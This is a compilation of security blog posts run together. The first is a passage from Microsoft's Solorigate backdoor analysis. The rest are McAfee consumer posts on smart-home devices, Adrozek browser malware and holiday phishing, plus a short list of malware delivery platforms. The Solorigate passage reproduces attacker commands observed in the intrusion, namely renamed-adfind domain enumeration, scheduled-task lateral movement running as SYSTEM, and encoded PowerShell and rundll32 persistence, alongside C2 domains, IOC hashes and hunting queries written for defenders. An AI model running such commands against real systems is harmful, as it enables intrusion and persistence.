After the extensive validation described above, the backdoor enters its main execution stage. At its core, the backdoor is a very standard one that receives instructions from the C2 server, executes those instructions, and sends back information. The type of commands that can be executed range from manipulating of registry keys, to creating processes, and deleting files, etc., effectively providing the attackers with full access to the device, especially since it’s executing from a trusted, signed binary.

In its first step, the backdoor initiates a connection to a predefined C2 server to report some basic information about the compromised system and receive the first commands. The C2 domain is composed of four different parts: three come from strings that are hardcoded in the backdoor, and one component is generated dynamically based on some unique information extracted from the device. This means that every affected device generates a different subdomain to contact (and possibly more than one). Here’s an example of a generated domain:

Image showing components of dynamically generated C2 domain

Figure 6: Dynamically generated C2 domain

The dynamically generated portion of the domain is the interesting part. It is computed by hashing the following data:

  • The physical address of the network interface
  • The domain name of the device
  • The content of the MachineGuid registry value from the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

The backdoor also generates a pseudo-random URI that is requested on the C2 domain. Like the domain, the URI is composed using a set of hardcoded keywords and paths, which are chosen partly at random and partly based on the type of HTTP request that is being sent out. Possible URIs that can be generated follow these formats:

  • pki/crl/<random components>.crl, where <random components> can be numbers and one of the following strings:
    • “-root”
    • “-cert”
    • “-universal_ca”
    • “-ca”
    • “-primary_ca”
    • “-timestamp”
    • “-global”
    • “-secureca”
  • fonts/woff/<random components>-webfont<random component>.woff2 or fonts/woff/<random components>.woff2, where the <random components> can be numbers and one or more of the following strings:
    • “Bold”
    • “BoldItalic”
    • “ExtraBold”
    • “ExtraBoldItalic”
    • “Italic”,
    • “Light”
    • “LightItalic”
    • “Regular”
    • “SemiBold”
    • “SemiBoldItalic”
    • “opensans”
    • “noto”
    • “freefont”
    • “SourceCodePro”
    • “SourceSerifPro”
    • “SourceHanSans”
    • “SourceHanSerif”
  • swip/upd/<random components>, where <random components> can be one or more of the following strings:
    • “SolarWinds”
    • “.CortexPlugin”
    • “.Orion”
    • “Wireless”
    • “UI”
    • “Widgets”
    • “NPM”
    • “Apollo”
    • “CloudMonitoring”
    • “Nodes”,
    • “Volumes”,
    • “Interfaces”,
    • “Components”
  • swip/Upload.ashx
  • swip/Events

Here are examples of final URLs generated by the backdoor:

  • hxxps://3mu76044hgf7shjf[.]appsync-api[.]eu-west-1[.]avsvmcloud[.]com /swip/upd/Orion[.]Wireless[.]xml
  • hxxps://3mu76044hgf7shjf[.]appsync-api[.]us-east-2[.]avsvmcloud[.]com /pki/crl/492-ca[.]crl
  • hxxps://3mu76044hgf7shjf[.]appsync-api[.]us-east-1[.]avsvmcloud[.]com /fonts/woff/6047-freefont-ExtraBold[.]woff2

Finally, the backdoor composes a JSON document into which it adds the unique user ID described earlier, a session ID, and a set of other non-relevant data fields. It then sends this JSON document to the C2 server.

Screenshot of data generated by malware

Figure 7: Example of data generated by the malware

If the communication is successful, the C2 responds with an encoded, compressed buffer of data containing commands for the backdoor to execute. The C2 might also respond with information about an additional C2 address to report to. The backdoor accepts the following commands:

  • Idle
  • Exit
  • SetTime
  • CollectSystemDescription
  • UploadSystemDescription
  • RunTask
  • GetProcessByDescription
  • KillTask
  • GetFileSystemEntries
  • WriteFile
  • FileExists
  • DeleteFile
  • GetFileHash
  • ReadRegistryValue
  • SetRegistryValue
  • DeleteRegistryValue
  • GetRegistrySubKeyAndValueNames
  • Reboot
  • None

In a nutshell, these commands allow the attackers to run, stop, and enumerate processes; read, write, and enumerate files and registry keys; collect and upload information about the device; and restart the device, wait, or exit. The command CollectSystemDescription retrieves the following information:

  • Local Computer Domain name
  • Administrator Account SID
  • HostName
  • Username
  • OS Version
  • System Directory
  • Device uptime
  • Information about the network interfaces

Resulting hands-on-keyboard attack

Once backdoor access is obtained, the attackers follow the standard playbook of privilege escalation exploration, credential theft, and lateral movement hunting for high-value accounts and assets. To avoid detection, attackers renamed Windows administrative tools like adfind.exe which were then used for domain enumeration.

C:\Windows\system32\cmd.exe /C csrss.exe -h -f (name=”Domain Admins”) member -list | csrss.exe -h -f objectcategory=* > .\Mod\mod1.log

Lateral movement was observed via PowerShell remote task creation, as detailed by FireEye and Volexity:

$scheduler = New-Object -ComObject (“Schedule.Service”);$scheduler.Connect($env:COMPUTERNAME);$folder = $scheduler.GetFolder(“\Microsoft\Windows\SoftwareProtectionPlatform”);$task = $folder.GetTask(“EventCacheManager”);$definition = $task.Definition;$definition.Settings.ExecutionTimeLimit = “PT0S”;$folder.RegisterTaskDefinition($task.Name,$definition,6,”System”,$null,5);echo “Done” C:\Windows\system32\cmd.exe /C schtasks /create /F /tn “\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager” /tr “C:\Windows\SoftwareDistribution\EventCacheManager.exe” /sc ONSTART /ru system /S [machine_name]

Persistence is achieved via backdoors deployed via various techniques:

  1. PowerShell:

Powershell -nop -exec bypass -EncodedCommand

The –EncodedCommand, once decoded, would resemble:

Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION

  1. Rundll32:

C:\Windows\System32\rundll32.exe C:\Windows\Microsoft.NET\Framework64\[malicious .dll file], [various exports]

With Rundll32, each compromised device receives a unique binary hash, unique local filesystem path, pseudo-unique export, and unique C2 domain.

The backdoor also allows the attackers to deliver second-stage payloads, which are part of the Cobalt Strike software suite. We continue to investigate these payloads, which are detected as Trojan:Win32/Solorigate.A!dha, as the situation continues to unfold.

Microsoft Defender for Endpoint product and hardening guidance

Supply chain compromise continues to be a growing concern in the security industry. The Solorigate incident is a grave reminder that these kinds of attacks can achieve the harmful combination of widespread impact and deep consequences for successfully compromised networks. We continue to urge customers to:

  • Isolate and investigate devices where these malicious binaries have been detected
  • Identify accounts that have been used on the affected device and consider them compromised
  • Investigate how those endpoints might have been compromised
  • Investigate the timeline of device compromise for indications of lateral movement

Hardening networks by reducing attack surfaces and building strong preventative protection are baseline requirements for defending organizations. On top of that, comprehensive visibility into system and network activities drive the early detection of anomalous behaviors and potential signs of compromise. More importantly, the ability to correlate signals through AI could surface more evasive attacker activity.

Microsoft Defender for Endpoint has comprehensive detection coverage across the Solorigate attack chain. These detections raise alerts that inform security operations teams about the presence of activities and artifacts related to this incident. Given that this attack involves the compromise of legitimate software, automatic remediation is not enabled to prevent service interruption. The detections, however, provide visibility into the attack activity. Analysts can then use investigation and remediation tools in Microsoft Defender Endpoint to perform deep investigation and additional hunting.

Microsoft 365 Defender provides visibility beyond endpoints by consolidating threat data from across domains – identities, data, cloud apps, as well as endpoints – delivering coordinated defense against this threat. This cross-domain visibility allows Microsoft 365 Defender to correlate signals and comprehensively resolve whole attack chains. Security operations teams can then hunt using this rich threat data and gain insights for hardening networks from compromise. Read: Using Microsoft 365 Defender to protect against Solorigate.

Solorigate attack chain diagram

Figure 8. Microsoft Defender for Endpoint detections across the Solorigate attack chain

Several Microsoft Defender for Endpoint capabilities are relevant to the Solorigate attack:

Next generation protection

Microsoft Defender Antivirus, the default antimalware solution on Windows 10, detects and blocks the malicious DLL and its behaviors. It quarantines malware, even if the process is running.

Detection for backdoored SolarWinds.Orion.Core.BusinessLayer.dll files:

Detection for Cobalt Strike fragments in process memory and stops the process:

Detection for the second-stage payload, a cobalt strike beacon that might connect to infinitysoftwares[.]com.

Detection for the PowerShell payload that grabs hashes and SolarWinds passwords from the database along with machine information:

Screenshot of Microsoft Defender Security Center alert of Solorigate malware being prevented

Figure 9. Microsoft Defender for Endpoint prevented malicious binaries

Endpoint detection and response (EDR)

Alerts with the following titles in the Microsoft Defender Security Center and Microsoft 365 security center can indicate threat activity on your network:

  • SolarWinds Malicious binaries associated with a supply chain attack
  • SolarWinds Compromised binaries associated with a supply chain attack
  • Network traffic to domains associated with a supply chain attack

Alerts with the following titles in the Microsoft Defender Security Center and Microsoft 365 security center can indicate the possibility that the threat activity in this report occurred or might occur later. These alerts can also be associated with other malicious threats.

  • ADFS private key extraction attempt
  • Masquerading Active Directory exploration tool
  • Suspicious mailbox export or access modification
  • Possible attempt to access ADFS key material
  • Suspicious ADFS adapter process created

Screenshot of Microsoft Defender Security Center alert of ADFS private key extraction attempt

Figure 10. Microsoft Defender for Endpoint detections of suspicious LDAP query being launched and attempted ADFS private key extraction

Screenshot of Microsoft Defender Security Center alert of Possible attempt to access ADFS key material

Figure 11. Microsoft Defender for Endpoint alert description and recommended actions for possible attempt to access ADFS key material

Our ability to deliver these protections through our security technologies is backed by our security experts who immediately investigated this attack and continue to look into the incident as it develops. Careful monitoring by experts is critical in this case because we’re dealing with a highly motivated and highly sophisticated threat actor. In the same way that our products integrate with each other to consolidate and correlate signals, security experts and threat researchers across Microsoft are working together to address this advanced attack and ensure our customers are protected.

Threat analytics report

We published a comprehensive threat analytics report on this incident. Threat analytics reports provide technical information, detection details, and recommended mitigations designed to empower defenders to understand attacks, assess its impact, and review defenses.

Screenshot of Threat Analytics report for Solorigate in Microsoft Defender Security Center

Figure 12. Threat analytics report on the Solorigate attack

Advanced hunting

Microsoft 365 Defender and Microsoft Defender for Endpoint customers can run advanced hunting queries to hunt for similar TTPs used in this attack.

Malicious DLLs loaded into memory

To locate the presence or distribution of malicious DLLs loaded into memory, run the following query

DeviceImageLoadEvents | where SHA1 in (“d130bd75645c2433f88ac03e73395fba172ef676″,”1acf3108bf1e376c8848fbb25dc87424f2c2a39c”,”e257236206e99f5a5c62035c9c59c57206728b28″,”6fdd82b7ca1c1f0ec67c05b36d14c9517065353b”,”2f1a5a7411d015d01aaee4535835400191645023″,”bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387″,”16505d0b929d80ad1680f993c02954cfd3772207″,”d8938528d68aabe1e31df485eb3f75c8a925b5d9″,”395da6d4f3c890295f7584132ea73d759bd9d094″,”c8b7f28230ea8fbf441c64fdd3feeba88607069e”,”2841391dfbffa02341333dd34f5298071730366a”,”2546b0e82aecfe987c318c7ad1d00f9fa11cd305″,”e2152737bed988c0939c900037890d1244d9a30e”) or SHA256 in (“ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6″,”dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b”,”eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed”,”ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c”,”019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134″,”c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77″,”0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589″,”e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d”,”20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9″,”2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d”,”a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d”,”92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690″,”a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2″,”cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6″)

Malicious DLLs created in the system or locally

To locate the presence or distribution of malicious DLLs created in the system or locally, run the following query

DeviceFileEvents | where SHA1 in (“d130bd75645c2433f88ac03e73395fba172ef676″,”1acf3108bf1e376c8848fbb25dc87424f2c2a39c”,”e257236206e99f5a5c62035c9c59c57206728b28″,”6fdd82b7ca1c1f0ec67c05b36d14c9517065353b”,”2f1a5a7411d015d01aaee4535835400191645023″,”bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387″,”16505d0b929d80ad1680f993c02954cfd3772207″,”d8938528d68aabe1e31df485eb3f75c8a925b5d9″,”395da6d4f3c890295f7584132ea73d759bd9d094″,”c8b7f28230ea8fbf441c64fdd3feeba88607069e”,”2841391dfbffa02341333dd34f5298071730366a”,”2546b0e82aecfe987c318c7ad1d00f9fa11cd305″,”e2152737bed988c0939c900037890d1244d9a30e”) or SHA256 in (“ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6″,”dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b”,”eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed”,”ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c”,”019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134″,”c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77″,”0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589″,”e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d”,”20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9″,”2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d”,”a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d”,”92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690″,”a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2″,”cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6″)

SolarWinds processes launching PowerShell with Base64

To locate SolarWinds processes spawning suspected Base64-encoded PowerShell commands, run the following query 

DeviceProcessEvents| where InitiatingProcessFileName =~ “SolarWinds.BusinessLayerHost.exe”| where FileName =~ “powershell.exe”// Extract base64 encoded string, ensure valid base64 length| extend base64_extracted = extract(‘([A-Za-z0-9+/]{20,}[=]{0,3})’, 1, ProcessCommandLine)| extend base64_extracted = substring(base64_extracted, 0, (strlen(base64_extracted) / 4) * 4)| extend base64_decoded = replace(@’\0′, ”, make_string(base64_decode_toarray(base64_extracted)))//| where notempty(base64_extracted) and base64_extracted matches regex ‘[A-Z]’ and base64_extracted matches regex ‘[0-9]’

SolarWinds processes launching CMD with echo

To locate SolarWinds processes launching CMD with echo,  run the following query 

DeviceProcessEvents| where InitiatingProcessFileName =~ “SolarWinds.BusinessLayerHost.exe”| where FileName == “cmd.exe” and ProcessCommandLine has “echo”

C2 communications

To locate DNS lookups to a malicious actor’s domain, run the following query 

DeviceEvents| where ActionType == “DnsQueryResponse” //DNS Query Responseand AdditionalFields has “.avsvmcloud”

To locate DNS lookups to a malicious actor’s domain, run the following query 

DeviceNetworkEvents| where RemoteUrl contains ‘’| where InitiatingProcessFileName != “chrome.exe”| where InitiatingProcessFileName != “msedge.exe”| where InitiatingProcessFileName != “iexplore.exe”| where InitiatingProcessFileName != “firefox.exe”| where InitiatingProcessFileName != “opera.exe”

Find SolarWinds Orion software in your enterprise

To search for Threat and Vulnerability Management data to find SolarWinds Orion software organized by product name and ordered by how many devices the software is installed on, run the following query 

DeviceTvmSoftwareInventoryVulnerabilities| where SoftwareVendor == ‘solarwinds’| where SoftwareName startswith ‘orion’| summarize dcount(DeviceName) by SoftwareName| sort by dcount_DeviceName desc

ADFS adapter process spawning

DeviceProcessEvents| where InitiatingProcessFileName =~”Microsoft.IdentityServer.ServiceHost.exe”| where FileName in~(“werfault.exe”, “csc.exe”)| where ProcessCommandLine !contains (“nameId”)



MITRE ATT&CK techniques observed

This threat makes use of attacker techniques documented in the MITRE ATT&CK framework.

Initial Access

T1195.001 Supply Chain Compromise


T1072 Software Deployment Tools

Command and Control

T1071.004 Application Layer Protocol: DNS

T1017.001 Application Layer Protocol: Web Protocols

T1568.002 Dynamic Resolution: Domain Generation Algorithms

T1132 Data Encoding


T1078 Valid Accounts 

Defense Evasion

T1480.001 Execution Guardrails: Environmental Keying

T1562.001 Impair Defenses: Disable or Modify Tools


T1005 Data From Local System 

Additional malware discovered

In an interesting turn of events, the investigation of the whole SolarWinds compromise led to the discovery of an additional malware that also affects the SolarWinds Orion product but has been determined to be likely unrelated to this compromise and used by a different threat actor. The malware consists of a small persistence backdoor in the form of a DLL file named App_Web_logoimagehandler.ashx.b6031896.dll, which is programmed to allow remote code execution through SolarWinds web application server when installed in the folder “inetpub\SolarWinds\bin\”. Unlike Solorigate, this malicious DLL does not have a digital signature, which suggests that this may be unrelated to the supply chain compromise.  Nonetheless, the infected DLL contains just one method (named DynamicRun), that can receive a C# script from a web request, compile it on the fly, and execute it.

Screenshot of code of the original DLL

Figure 13: Original DLL

Screenshot of DLL code with inserted malicious code

Figure 14: The malicious addition that calls the DynamicRun method

This code provides an attacker the ability to send and execute any arbitrary C# program on the victim’s device. Microsoft Defender Antivirus detects this compromised DLL as Trojan:MSIL/Solorigate.G!dha.



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft 365 Defender tech community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers appeared first on Microsoft Security.

Best Smart Home Devices for a Connected New Year

smart gifts

 Like many of you, I spent a lot of time at home this year, but it came with an unexpected upside: an excuse to upgrade all my home tech! With so many great new products on the market, from 5G devices to smart TVs, cameras, and more, there’s a lot to choose from this holiday season, and into the New Year.

In fact, the smart home market is set to grow by nearly 12% over the next five years, to $135 billion, so I’m sure even more devices are coming. But for now, here are the devices on my wish list, and how to protect them once they’re unboxed.

Smart Thermostats—These have been around for a while, but the newest additions include features that keep your home comfortable, and eco-friendly, by giving you greater control over your energy use. Some thermostats can detect your habits, and heat or cool different areas of your home, depending on which rooms you are using. And others now connect to smart speakers, allowing you to stream your favorite music and podcasts, or receive calendar alerts.

Bluetooth Speakers—Speaking of high-tech speakers, this category has taken off in recent years, but now there are more options for different types of users. While some people like the voice command features that turn their speakers into personal assistants, other users just want portable speakers with great sound quality and a sleek style. Now you can find a variety of different designs, sizes, and price points.

Smart TVs—With the explosion of streaming content services, and the demand for more in-home entertainment during the pandemic, smart TVs have become a must-have item for many. The latest offer 4K streaming video, which gives you higher resolution, although you need to stream 4K content to get the benefit. It may be worth the investment for other new features, however, such as a faster user interface, and a built-in universal search engine that will allow you to easily locate a favorite movie, actor, or genre.

IP Cameras— Internet-connected cameras can be an affordable security option, and the latest versions offer extra surveillance with wide-angle lenses, night vision, and wireless options for outdoors. Some cameras even do motion tracking, and offer facial recognition, in case you want to know right away if the person on your property is a known entity or a stranger. Just keep in mind that to get the advanced features you usually need to sign up for a subscription service as well.

Gaming Router—As the father of two school-aged children, I know a lot of parents are wary of online gaming, but here’s why a gaming router may be a great gift, even if there are no hardcore gamers in the house. These routers aim to give you a more reliable internet connection, while allowing multiple devices to simultaneously receive data streams, which could be a game changer if your whole family is trying to work and learn online from home.

Some routers even offer Wi-Fi 6, which is a huge jump in potential speed to 9.6 Gbps from the current 3.5 Gbps. This also means that all the devices connected to your network could see a significant speed increase, but only if you have devices that can take advantage of it.

Here are a few more great holiday gifts ideas:

  • Smart locks and doorbells
  • Smart lightbulbs
  • Intelligent air purifiers

How To Secure Your Smart Home Devices?

While the best smart home devices can certainly make your home more convenient, safe, and fun, they do open the door to some risk. You may have read about IP cameras being hacked, or other ways in which home networks are vulnerable to attacks. This is because most Internet of Things (IoT) devices come with little built-in security, making them an easy target for hackers.

Here’s how to secure both your network and your devices so you can enjoy them without worry.

  • Buy from reputable brands—Try to choose products from brands you trust, and who have a good reputation when it comes to support and built-in security features.
  • Change the Default Username & Passwords—Default names and passwords are often available on the dark web, allowing cybercriminals to login to your devices. Once logged in, they could potentially use the connection to distribute malware aimed at infecting the computers or smartphones connected to the same network.
  • Setup A Guest Network—To further protect your content-rich devices, set up a guest network on your router that is exclusively for your home IoT. With a guest network, you can also make sure that devices are only connected during the right times, and with the right permissions. Follow the instruction in your router manual or look them up online.
  • Practice Good Password Hygiene —Since you need to change the default passwords anyway, make each password unique and change them regularly. To make life even easier, use a password manager to generate and track your complex passwords for you.
  • Secure Your Network—Since your router is the central hub for all the connected devices, make it as secure as possible by checking to see that it uses encryption to scramble your data so that no one else can see it. A solution like McAfee Secure Home Platform makes it easy to protect your connected home.
  • Use Powerful Security Software—Invest in comprehensive security software that can detect and block a variety of threats, and make sure it includes a firewall so all the computers and devices on your home network are protected. A product like McAfee® Total Protection has the added benefit of including a password manager, multi-device compatibility, device security, and a Virtual Private Network (VPN), which ensures that you can safely connect to the internet no matter where you go. Importantly, it also includes dark web monitoring to help protect your personal and financial information by alerting you if your data is lost or stolen.


By taking these precautions as soon as you unwrap your smart home devices, you’re setting yourself up for a fun, and safe, tech-filled New Year.

The post Best Smart Home Devices for a Connected New Year appeared first on McAfee Blogs.

Adrozek Malware is Wreaking Havoc on Web Browsers: How to Stay Protected


Adrozek Malware is Wreaking Havoc on Web Browsers: How to Stay Protected

Every few weeks, there seems to be breaking news about large-scale data breaches that affect millions – but what about the lesser-known threats that lurk quietly in the shadows? Oftentimes, these are the scams that could wreak havoc on our day-to-day digital lives.

Adrozek malware is just that: a new strain that affects web browsers, stealthily stealing credentials through “drive-by downloads,” or a download that happens without your knowledge.

Let’s unpack how this malware works, who it targets, and what we can do to protect our browsers from this sneaky threat.

Browsers, Beware!

According to Threatpost, Adrozek is infecting several web browsers (including Google Chrome, Microsoft Edge, Mozilla Firefox, and Yandex) on Windows machines with the help of a browser modifier that hijacks search results. To find its way onto our devices, the malware uses “drive-by downloads” once you load one of its several malicious web pages. In fact, a huge, global infrastructure supports Adrozek – one that is made up of 159 unique domain names, each hosting an average of 17,300 unique URLs, which in turn hosts more than 15,300 unique malware samples.

Once it makes its way onto your machine, the malware changes the device’s browser settings to allow Adrozek to insert fake ads over real ones. If you do happen to click on one of these fraudulent ads, the scammers behind this threat earn affiliate advertising dollars for each user they deceive. This not only takes money away from advertisers who are unaware that malware is increasing their traffic, but it also pays cybercriminals for their crimes. What’s more, the malware extracts data from the infected device and sends it to a remote server for future exploitation. In some cases, it even steals saved passwords from Firefox. These features allow the cybercriminals behind Adrozek to capitalize on the initial threat by collecting data that could be used against everyday users like you and me when we least expect it.

Adrozek: A Malware Chameleon

Aside from being supported by a vast infrastructure, Adrozek is powerful for another reason: it’s difficult to spot. Adrozek is a type of polymorphic malware, or malware that is programmed to constantly shift and change its code to avoid detection. As a result, it can be tricky to find and root out once it’s infected your browser.

Fight Back Against Malware

To help protect your devices from falling victim to the latest theats, follow these tips to help protect your online security:

Keep your browser updated

Software developers are actively working to identify and address security issues. Frequently update your browsers, operating systems, and apps so that they have the latest fixes and security protections.

Practice proper password hygiene

Because Adrozek actively steals saved passwords from Firefox, it’s crucial to practice good password hygiene. When updating your credentials, you should always ensure that your password is strong and unique. Many users utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials.

Reinstall your browsers

You can typically get rid of browser-hijacking malware by resetting the browser. But because Adrozek will hide itself on your device, extra measures should be taken to get rid of it. If you suspect that Adrozek may have found its way onto your device, delete your browsers, run a malware scan, and reboot your device. Run the malware scan a second time and reinstall your browsers.

Use a comprehensive security solution

Use a solution like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Adrozek Malware is Wreaking Havoc on Web Browsers: How to Stay Protected appeared first on McAfee Blogs.

Malware Delivery Platforms in 2020

Once upon a time the Malware, the main actor in the entire infection chain. A single file, once executed it was able to perform the tasks it was designed for, forcing the target machine into victim by taking control or simply execuritying desired (sometime priviledged) commands. In 2010, during my PhD studies, I was already observing a slow but certain change in this panorama. During that period Matt and I wrote for IEEE a paper title: “Multi-stage delivery of malware” (HERE) where we described how thrat actors were abusing mutistaging techniques to inoculate malicious and unwanted software.

Malware signature detectors use patterns of bytes, or variations of patterns of bytes, to detect malware attempting to enter a systems. This approach assumes the signatures are both or sufficient length to identify the malware, and to distinguish it from non-malware objects entering the system. We describe a technique that can increase the difficulty of both to an arbitrary degree. This technique can exploit an optimization that many anti-virus systems use to make inserting the malware simple; fortunately, this particular exploit is easy to detect, provided the optimization is not present. We describe some experiments to test the effectiveness of this technique in evading existing signature-based malware detectors.

Multi-stage delivery of malware – Abstract

Nowadays these thechinques are so used that we are facing multistage frameworks rather than Malware. I do prefer call them Malware delivery platforms. I am talking about EMOTET, TrickBot, QakBot and so on, those frameworks are not Malware anymore (even if they started as Malware), but are real and powerfull platforms able to deliver multiple Malware. Once the multiple Malware have been dropped and executed into a single or multiple targets, we are facing an implant. So, after 10 Years from such a paper how many platforms have been developed and how do they behave ?

Malware Delivery Platforms

In this post I’d like to fix on my meories the Malware Delivery Platforms in 2020. I believe those platforms are changing again and again, I bet we’ll see some new evolutions on the Malware infection chain panorama in early future so let’s write some simple notes on how things are working today. Please if you have more infos or if you want to make this post up-to-date, please contact me (from HERE), I will make updates and written thank you to every contributors.


One of the most famous Malware Delivery Platforms. It is used to deliver (in 2020) Trickbot. Often involved in the multiple infection chain Emotet-Trickbot-Ruyk, developing one of the most spread Ransomware as a service in our recent history


One of the most sophisticated Malware Delivery Platforms. Often dropped and executed by Emotet (but not only) it’s famous to deliver Ryuk and Conti Ransomware.


BazarLoader not such a spread delivery platform in 2020, used mainly to deliver Ryuk Ransomware and linked to TrickBot


Interesting new (if compared to Emotet) Malware delivery platform. In the past months it has been observed tight to MegaCortex
and Egregor


One of the most famous platform related to TA505. It’s actually a quite wired platform, quite simple if compared to the “mainland” but seen as entry point for Clopper


A quite famous and ancient Banking Malware. It has got many upgrades during the years, nowadays it is mostly used as dropping platform mainly observed for launching BitPaymer and DoppelPaymer


ZLoader is a wellknown Delivery platform, mostly used in Europe and US. It has been mostly observet for spreading Ryuk and Egregor.


This is one of the latest entries in the Delivery Platforms landscaped. It is mostly seed to drop and execute Egregor and Ryuk Ransomware, while Sophos correlates BuerLoader Ryuk gang.


Nowadays is mostly spread in Japan and it’s a small and quite new Malware Delivery Platform. Todays known to drop and execute Avaddon.


This post is not about describing details on Malware Delivery Platforms (MDP), but it’s a simple way to freeze a state of the art as today (Decembre 2020) on MDP. This small post could be usefull for Cybersecurity Analysts and SOC operators which need to reconstruct the whole infection chain.

If you are aware on more platforms and you want to contribute, please reach me out and send commetns to me. I will update this post as soon as will receive your comments. It would be great to maintain this post up-to-date withing future platforms integrations.

Top Phishing Lures to Look Out for This Holiday Season

holiday phishing scams

Top Phishing Lures to Look Out for This Holiday Season

And just like that, the holidays are here! That means it’s time to grab your devices and credit cards for some online holiday shopping. But while you plan to share the merry and shop for gifts, criminals are preparing some not-so-festive tricks of their own. According to Threatpost, various phishing scams are currently targeting eager consumers this holiday season.

Let’s unwrap the top four phishing scams that users should beware of while making online purchases this week and through the rest of the year.

Email Phishing: How Cyber-Grinches Steal Your Inbox

It might surprise you to see that a tactic as old as email phishing is still so widely used today. Well, that’s because many people still fall for email phishing scams, as the criminals behind these attacks up the ante every year to make these threats more sophisticated.

Scammers also tend to take advantage of current events to trick unsuspecting consumers into falling for their tricks. Take earlier this year, for example, when many users received phishing emails claiming to be from a government entity regarding financial support due to the global health emergency. Cybercriminals will likely use similar, timely tactics leading up to the holidays, posing as famous retailers and promising fake discounts in the hope that a consumer will divulge their credit card details or click on a malicious link.

Spear Phishing Takes Advantage of the Season of Giving

Like email phishing, spear phishing has been around for quite some time. With spear phishing attacks, hackers pretend to be an organization or individual that you’re familiar with and include a piece of content—a link, an email attachment, etc.—that they know you’ll want to interact with. For example, cybercriminals might claim to be charitable organizations asking for donations, knowing that many families like to donate during the holidays. The email might even include the recipient’s personal details to make it seem more convincing. But instead of making a generous contribution, users find that they infected their own system with malware by clicking on the fraudulent link.

Dasher, Dancer, Prancer, Vishing?

No, that’s not the sound of Santa coming down the chimney – it’s the sound of voice phishing! “Vishing” attacks can be highly deceiving, as hackers will call a user and trick them into giving up their credentials or sharing other personal information. For example, a scammer could call an individual telling them that they won a large amount of cash as part of a holiday contest. Overjoyed with the thought of winning this so-called contest, the user may hand over their bank information to the criminal on the other end of the phone. But instead of receiving a direct deposit, all they find is that their banking credentials were used to make a fraudulent purchase.

Special Delivery or SMiShing?

SMS phishing, or “SMiShing,” is another threat users should watch out for this holiday season. This tactic uses misleading text messages claiming to come from a trusted person or organization to trick recipients into taking a certain action that gives the attacker exploitable information or access to their mobile device.

Due to the current global health emergency and the desire to do more digitally, consumers will likely rely on online shopping this holiday season. To take advantage of this trend, scammers will probably send fraudulent text messages disguised as online retailers. These messages will likely contain fake tracking links, shipping notices, and order confirmations. But if an unsuspecting user clicks on one of these links, they will be directed to a fake website prompting them to enter their credentials for the attackers to further exploit.

Avoid Unwanted Security “Presents” This Holiday Season

 To prevent cybercriminals from messing with the festive spirit via phishing schemes, follow these tips so you can continue to make merry during the holiday shopping season:

Be cautious of emails asking you to act 

If you receive an email, call, or text asking you to download software or pay a certain amount of money, don’t click on anything or take any direct action from the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links or forking over money unnecessarily.

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

Go directly to the source

Instead of clicking on a link in an email or text message, it’s always best to check directly with the source to verify a holiday shopping offer or track a package’s shipment.

Browse with caution

Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



The post Top Phishing Lures to Look Out for This Holiday Season appeared first on McAfee Blogs.

